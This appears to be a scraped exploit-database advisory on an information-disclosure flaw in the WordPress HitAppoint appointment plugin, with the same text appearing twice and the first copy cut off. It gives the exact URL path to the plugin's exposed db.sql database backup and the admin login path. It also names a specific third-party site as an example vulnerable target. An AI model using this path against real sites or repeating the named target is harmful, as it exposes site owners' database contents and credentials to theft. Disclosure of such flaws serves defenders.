``` ################################################################################################# #Exploit Title : WordPress HitAppoint Plugins Database Backup Information Disclosure Vulnerability #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army #Date : 19/11/2018 #Vendor Homepage : wordpress.org ~ hitappoint.com/wordpress-appointment-plugin/ #Tested On : Windows and Linux #Category : WebApps #Exploit Risk : Medium #CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] ################################################################################################# #Admin Panel Login Path : /wp-login.php #Exploit : /wp-content/plugins/hitappoint/core/model/db.sql ################################################################################################# #Example Vulnerable Sites => [+] timhillphotography.com/wp-content/plugins/hitappoint/core/model/db.sql...
``` ################################################################################################# #Exploit Title : WordPress HitAppoint Plugins Database Backup Information Disclosure Vulnerability #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army #Date : 19/11/2018 #Vendor Homepage : wordpress.org ~ hitappoint.com/wordpress-appointment-plugin/ #Tested On : Windows and Linux #Category : WebApps #Exploit Risk : Medium #CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] ################################################################################################# #Admin Panel Login Path : /wp-login.php #Exploit : /wp-content/plugins/hitappoint/core/model/db.sql ################################################################################################# #Example Vulnerable Sites => [+] timhillphotography.com/wp-content/plugins/hitappoint/core/model/db.sql ################################################################################################# #Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ################################################################################################# ```
